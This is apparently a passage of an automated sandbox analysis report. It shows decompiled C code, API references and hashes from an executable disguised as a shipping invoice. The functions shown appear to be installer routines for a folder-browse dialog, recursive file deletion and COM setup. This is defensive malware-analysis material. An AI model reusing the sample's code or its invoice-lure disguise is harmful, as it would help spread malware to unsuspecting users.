                                                                                                                                    • Instruction Fuzzy Hash: 85A15A71900608BFDB119FA1DE89EAE7B79FB08344F50403AFA05B61A0CB754E51DF68
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00404686, Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 274stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                    			E00404686(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42a070;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405866(0x3fb, _t146);
					E004063D0(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405866(0x3fb, _t146);
							if(E00405BEC(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00406166(0x429868, _t146);
							_t87 = E004064FE(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406166(0x429868, _t146);
								_t89 = E00405B97(0x429868);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429868,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429868) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429868,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405B45(0x429868);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429868) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404B1A(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42ebfc; // 0x671d5f
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404B02(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429858);
									} else {
										E00404A3D(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42f4e4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00404216(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a888 == _t158) {
									E004045DF();
								}
								 *0x42a888 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a898;
							_v60 = E004049D7;
							_v56 = _t146;
							_v68 = E00406188(_t146, 0x42a898, _t166, 0x429c70, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405AFE(_t146);
								_t125 =  *((intOrPtr*)( *0x42f434 + 0x11c));
								if( *((intOrPtr*)( *0x42f434 + 0x11c)) != 0 && _t146 == 0x435400) {
									E00406188(_t146, 0x42a898, _t166, 0, _t125);
									if(lstrcmpiA(0x42e3c0, 0x42a898) != 0) {
										lstrcatA(_t146, 0x42e3c0);
									}
								}
								 *0x42a888 =  *0x42a888 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405B6B(_t146) != 0 && E00405B97(_t146) == 0) {
						E00405AFE(_t146);
					}
					 *0x42ebf8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004041F4(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004041F4(_t166);
					E00404229(_t165);
					_t138 = E004064FE(7);
					if(_t138 == 0) {
						L53:
						return E0040425B(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                                                                                                                                    0x00404686
                                                                                                                                    0x0040468c
                                                                                                                                    0x00404692
                                                                                                                                    0x0040469f
                                                                                                                                    0x004046ad
                                                                                                                                    0x004046b0
                                                                                                                                    0x004046b8
                                                                                                                                    0x004046be
                                                                                                                                    0x004046be
                                                                                                                                    0x004046ca
                                                                                                                                    0x004046cd
                                                                                                                                    0x0040473b
                                                                                                                                    0x00404742
                                                                                                                                    0x00404819
                                                                                                                                    0x00404820
                                                                                                                                    0x0040482f
                                                                                                                                    0x0040482f
                                                                                                                                    0x00404833
                                                                                                                                    0x0040483d
                                                                                                                                    0x0040484a
                                                                                                                                    0x0040484c
                                                                                                                                    0x0040484c
                                                                                                                                    0x0040485a
                                                                                                                                    0x00404861
                                                                                                                                    0x00404868
                                                                                                                                    0x0040486b
                                                                                                                                    0x004048a2
                                                                                                                                    0x004048a4
                                                                                                                                    0x004048aa
                                                                                                                                    0x004048af
                                                                                                                                    0x004048b3
                                                                                                                                    0x004048b5
                                                                                                                                    0x004048b5
                                                                                                                                    0x004048d1
                                                                                                                                    0x00000000
                                                                                                                                    0x004048d3
                                                                                                                                    0x004048d6
                                                                                                                                    0x004048e4
                                                                                                                                    0x004048ea
                                                                                                                                    0x004048eb
                                                                                                                                    0x004048ee
                                                                                                                                    0x004048f1
                                                                                                                                    0x00000000
                                                                                                                                    0x004048f1
                                                                                                                                    0x0040486d
                                                                                                                                    0x0040486f
                                                                                                                                    0x00404873
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00404875
                                                                                                                                    0x00404875
                                                                                                                                    0x00404882
                                                                                                                                    0x00404887
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040488b
                                                                                                                                    0x0040488d
                                                                                                                                    0x0040488d
                                                                                                                                    0x00404895
                                                                                                                                    0x00404897
                                                                                                                                    0x0040489a
                                                                                                                                    0x0040489d
                                                                                                                                    0x004048a0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004048a0
                                                                                                                                    0x004048fd
                                                                                                                                    0x00404907
                                                                                                                                    0x0040490a
                                                                                                                                    0x0040490d
                                                                                                                                    0x00404914
                                                                                                                                    0x00404914
                                                                                                                                    0x00404916
                                                                                                                                    0x00404916
                                                                                                                                    0x0040491b
                                                                                                                                    0x0040491d
                                                                                                                                    0x00404925
                                                                                                                                    0x0040492c
                                                                                                                                    0x0040492e
                                                                                                                                    0x00404939
                                                                                                                                    0x00404939
                                                                                                                                    0x0040492e
                                                                                                                                    0x00404940
                                                                                                                                    0x00404949
                                                                                                                                    0x00404953
                                                                                                                                    0x0040495b
                                                                                                                                    0x00404976
                                                                                                                                    0x0040495d
                                                                                                                                    0x00404966
                                                                                                                                    0x00404966
                                                                                                                                    0x0040495b
                                                                                                                                    0x0040497b
                                                                                                                                    0x00404980
                                                                                                                                    0x00404985
                                                                                                                                    0x0040498e
                                                                                                                                    0x0040498e
                                                                                                                                    0x00404997
                                                                                                                                    0x00404999
                                                                                                                                    0x00404999
                                                                                                                                    0x004049a5
                                                                                                                                    0x004049ad
                                                                                                                                    0x004049b7
                                                                                                                                    0x004049b7
                                                                                                                                    0x004049bc
                                                                                                                                    0x00000000
                                                                                                                                    0x004049bc
                                                                                                                                    0x0040486b
                                                                                                                                    0x00404822
                                                                                                                                    0x00404829
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00404829
                                                                                                                                    0x00404748
                                                                                                                                    0x00404751
                                                                                                                                    0x0040476b
                                                                                                                                    0x00404770
                                                                                                                                    0x0040477a
                                                                                                                                    0x00404781
                                                                                                                                    0x0040478d
                                                                                                                                    0x00404790
                                                                                                                                    0x00404793
                                                                                                                                    0x0040479a
                                                                                                                                    0x004047a2
                                                                                                                                    0x004047a5
                                                                                                                                    0x004047a9
                                                                                                                                    0x004047b0
                                                                                                                                    0x004047b8
                                                                                                                                    0x00404812
                                                                                                                                    0x004047ba
                                                                                                                                    0x004047bb
                                                                                                                                    0x004047c2
                                                                                                                                    0x004047cc
                                                                                                                                    0x004047d4
                                                                                                                                    0x004047e1
                                                                                                                                    0x004047f5
                                                                                                                                    0x004047f9
                                                                                                                                    0x004047f9
                                                                                                                                    0x004047f5
                                                                                                                                    0x004047fe
                                                                                                                                    0x0040480b
                                                                                                                                    0x0040480b
                                                                                                                                    0x004047b8
                                                                                                                                    0x00000000
                                                                                                                                    0x00404770
                                                                                                                                    0x0040475e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00404764
                                                                                                                                    0x00000000
                                                                                                                                    0x004046cf
                                                                                                                                    0x004046dc
                                                                                                                                    0x004046e5
                                                                                                                                    0x004046f2
                                                                                                                                    0x004046f2
                                                                                                                                    0x004046f9
                                                                                                                                    0x004046ff
                                                                                                                                    0x00404708
                                                                                                                                    0x0040470b
                                                                                                                                    0x0040470e
                                                                                                                                    0x00404716
                                                                                                                                    0x00404719
                                                                                                                                    0x0040471c
                                                                                                                                    0x00404722
                                                                                                                                    0x00404729
                                                                                                                                    0x00404730
                                                                                                                                    0x004049c2
                                                                                                                                    0x004049d4
                                                                                                                                    0x00404736
                                                                                                                                    0x00404739
                                                                                                                                    0x00000000
                                                                                                                                    0x00404739
                                                                                                                                    0x00404730

                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32 ref: 004046D5
                                                                                                                                    • SetWindowTextA.USER32(00000000,?), ref: 004046FF
                                                                                                                                    • SHBrowseForFolderA.SHELL32(?,00429C70,?), ref: 004047B0
                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 004047BB
                                                                                                                                    • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,0042A898,00000000,?,?), ref: 004047ED
                                                                                                                                    • lstrcatA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent), ref: 004047F9
                                                                                                                                    • SetDlgItemTextA.USER32 ref: 0040480B
                                                                                                                                      • Part of subcall function 00405866: GetDlgItemTextA.USER32 ref: 00405879
                                                                                                                                      • Part of subcall function 004063D0: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403384,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035BB,?,00000006,00000008,0000000A), ref: 00406428
                                                                                                                                      • Part of subcall function 004063D0: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406435
                                                                                                                                      • Part of subcall function 004063D0: CharNextA.USER32(?,"C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403384,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035BB,?,00000006,00000008,0000000A), ref: 0040643A
                                                                                                                                      • Part of subcall function 004063D0: CharPrevA.USER32(?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403384,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035BB,?,00000006,00000008,0000000A), ref: 0040644A
                                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(00429868,?,?,0000040F,?,00429868,00429868,?,00000001,00429868,?,?,000003FB,?), ref: 004048C9
                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004048E4
                                                                                                                                      • Part of subcall function 00404A3D: lstrlenA.KERNEL32(0042A898,0042A898,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404958,000000DF,00000000,00000400,?), ref: 00404ADB
                                                                                                                                      • Part of subcall function 00404A3D: wsprintfA.USER32 ref: 00404AE3
                                                                                                                                      • Part of subcall function 00404A3D: SetDlgItemTextA.USER32 ref: 00404AF6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                    • String ID: A$C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent
                                                                                                                                    • API String ID: 2624150263-3943753584
                                                                                                                                    • Opcode ID: d38bf3420d21e256bd621a43167c3cd3246753b5e2f5eb5a84e4bcdf7102eb19
                                                                                                                                    • Instruction ID: 6c8ebc684f0cc4dcb687aa888a93160b118c07d9326b545430e1aa4709eeee8b
                                                                                                                                    • Opcode Fuzzy Hash: d38bf3420d21e256bd621a43167c3cd3246753b5e2f5eb5a84e4bcdf7102eb19
                                                                                                                                    • Instruction Fuzzy Hash: 13A181F1900209ABDB11AFA6CD45AAF77B8EF84314F14843BF601B62D1DB7C99418B69
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040592E, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159filestringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                    			E0040592E(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405BEC(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73);
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x42f4c8 =  *0x42f4c8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406166(0x42b8a0, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405B45(_t73);
					} else {
						lstrcatA(0x42b8a0, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x42b8a0,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405B29( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E00406166(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004058E6(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E0040528D(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42f4c8 =  *0x42f4c8 + 1;
										} else {
											E0040528D(0xfffffff1, _t73);
											E00405F45(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E0040592E(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x42b8a0 - 0x5c;
					if( *0x42b8a0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E00406469(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405AFE(_t73);
							_t40 = E004058E6(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E0040528D(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E0040528D(0xfffffff1, _t73);
							return E00405F45(_t72, _t73, 0);
						}
						L33:
						 *0x42f4c8 =  *0x42f4c8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}



















                                                                                                                                    0x00405938
                                                                                                                                    0x0040593d
                                                                                                                                    0x00405946
                                                                                                                                    0x00405949
                                                                                                                                    0x00405951
                                                                                                                                    0x00405954
                                                                                                                                    0x00405957
                                                                                                                                    0x0040595f
                                                                                                                                    0x00405961
                                                                                                                                    0x00405962
                                                                                                                                    0x00000000
                                                                                                                                    0x00405962
                                                                                                                                    0x0040596d
                                                                                                                                    0x00405970
                                                                                                                                    0x00405970
                                                                                                                                    0x00405970
                                                                                                                                    0x00405974
                                                                                                                                    0x00405987
                                                                                                                                    0x0040598e
                                                                                                                                    0x00405993
                                                                                                                                    0x00405997
                                                                                                                                    0x004059a7
                                                                                                                                    0x00405999
                                                                                                                                    0x0040599f
                                                                                                                                    0x0040599f
                                                                                                                                    0x004059ac
                                                                                                                                    0x004059af
                                                                                                                                    0x004059ba
                                                                                                                                    0x004059c0
                                                                                                                                    0x004059c5
                                                                                                                                    0x004059d5
                                                                                                                                    0x004059d7
                                                                                                                                    0x004059dd
                                                                                                                                    0x004059e0
                                                                                                                                    0x004059e3
                                                                                                                                    0x00405a9b
                                                                                                                                    0x00405a9b
                                                                                                                                    0x00405a9f
                                                                                                                                    0x00405aa1
                                                                                                                                    0x00405aa1
                                                                                                                                    0x00405aa1
                                                                                                                                    0x00405aa1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004059e9
                                                                                                                                    0x004059e9
                                                                                                                                    0x004059f2
                                                                                                                                    0x004059f8
                                                                                                                                    0x004059fd
                                                                                                                                    0x00405a00
                                                                                                                                    0x00405a02
                                                                                                                                    0x00405a06
                                                                                                                                    0x00405a08
                                                                                                                                    0x00405a08
                                                                                                                                    0x00405a06
                                                                                                                                    0x00405a0b
                                                                                                                                    0x00405a0e
                                                                                                                                    0x00405a21
                                                                                                                                    0x00405a23
                                                                                                                                    0x00405a28
                                                                                                                                    0x00405a2f
                                                                                                                                    0x00405a4a
                                                                                                                                    0x00405a4f
                                                                                                                                    0x00405a51
                                                                                                                                    0x00405a75
                                                                                                                                    0x00405a53
                                                                                                                                    0x00405a53
                                                                                                                                    0x00405a56
                                                                                                                                    0x00405a6a
                                                                                                                                    0x00405a58
                                                                                                                                    0x00405a5b
                                                                                                                                    0x00405a63
                                                                                                                                    0x00405a63
                                                                                                                                    0x00405a56
                                                                                                                                    0x00405a31
                                                                                                                                    0x00405a37
                                                                                                                                    0x00405a39
                                                                                                                                    0x00405a3f
                                                                                                                                    0x00405a3f
                                                                                                                                    0x00405a39
                                                                                                                                    0x00000000
                                                                                                                                    0x00405a2f
                                                                                                                                    0x00405a10
                                                                                                                                    0x00405a13
                                                                                                                                    0x00405a15
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405a17
                                                                                                                                    0x00405a19
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405a1b
                                                                                                                                    0x00405a1f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405a7a
                                                                                                                                    0x00405a84
                                                                                                                                    0x00405a8a
                                                                                                                                    0x00405a8a
                                                                                                                                    0x00405a95
                                                                                                                                    0x00000000
                                                                                                                                    0x00405a95
                                                                                                                                    0x004059b1
                                                                                                                                    0x004059b8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405976
                                                                                                                                    0x00405976
                                                                                                                                    0x00405978
                                                                                                                                    0x00405aa5
                                                                                                                                    0x00405aa7
                                                                                                                                    0x00405aaa
                                                                                                                                    0x00405afb
                                                                                                                                    0x00405afb
                                                                                                                                    0x00405afb
                                                                                                                                    0x00405aac
                                                                                                                                    0x00405aaf
                                                                                                                                    0x00405aba
                                                                                                                                    0x00405abf
                                                                                                                                    0x00405ac1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405ac4
                                                                                                                                    0x00405ad0
                                                                                                                                    0x00405ad5
                                                                                                                                    0x00405ad7
                                                                                                                                    0x00000000
                                                                                                                                    0x00405af2
                                                                                                                                    0x00405ad9
                                                                                                                                    0x00405adc
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405ae1
                                                                                                                                    0x00000000
                                                                                                                                    0x00405ae8
                                                                                                                                    0x00405ab1
                                                                                                                                    0x00405ab1
                                                                                                                                    0x00000000
                                                                                                                                    0x00405ab1
                                                                                                                                    0x0040597e
                                                                                                                                    0x00405981
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405981

                                                                                                                                    APIs
                                                                                                                                    • DeleteFileA.KERNEL32(?,?,73BCFA90,73BCF560,00000000), ref: 00405957
                                                                                                                                    • lstrcatA.KERNEL32(0042B8A0,\*.*,0042B8A0,?,?,73BCFA90,73BCF560,00000000), ref: 0040599F
                                                                                                                                    • lstrcatA.KERNEL32(?,0040A014,?,0042B8A0,?,?,73BCFA90,73BCF560,00000000), ref: 004059C0
                                                                                                                                    • lstrlenA.KERNEL32(?,?,0040A014,?,0042B8A0,?,?,73BCFA90,73BCF560,00000000), ref: 004059C6
                                                                                                                                    • FindFirstFileA.KERNEL32(0042B8A0,?,?,?,0040A014,?,0042B8A0,?,?,73BCFA90,73BCF560,00000000), ref: 004059D7
                                                                                                                                    • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A84
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00405A95
                                                                                                                                    Strings
                                                                                                                                    • \*.*, xrefs: 00405999
                                                                                                                                    • "C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" , xrefs: 0040592E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                    • String ID: "C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" $\*.*
                                                                                                                                    • API String ID: 2035342205-3600554274
                                                                                                                                    • Opcode ID: c96ec4be521e5d7df77d453e54af7214f002a37f78003e62dcfa7a5afb28e376
                                                                                                                                    • Instruction ID: 61471d95c0fd6fe071b402e198ed6c61b6b8f1e7f927aa751433fda80e9bf68b
                                                                                                                                    • Opcode Fuzzy Hash: c96ec4be521e5d7df77d453e54af7214f002a37f78003e62dcfa7a5afb28e376
                                                                                                                                    • Instruction Fuzzy Hash: A051B130A00A04AADF21AB658C85FBF7B78DF52314F14427BF841B51D2D77C4946DEAA
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00402138, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                    			E00402138(void* __eflags) {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x10) = E00402B2C(0xfffffff0);
				 *(_t111 - 0xc) = E00402B2C(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x44)) = E00402B2C(2);
				 *((intOrPtr*)(_t111 - 0x40)) = E00402B2C(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x4c)) = E00402B2C(0x45);
				_t55 =  *(_t111 - 0x24);
				 *(_t111 - 0x88) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x3c) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405B6B( *(_t111 - 0xc)) == 0) {
					E00402B2C(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x40851c, _t87, 1, 0x40850c, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x40852c, _t111 - 0x1c);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
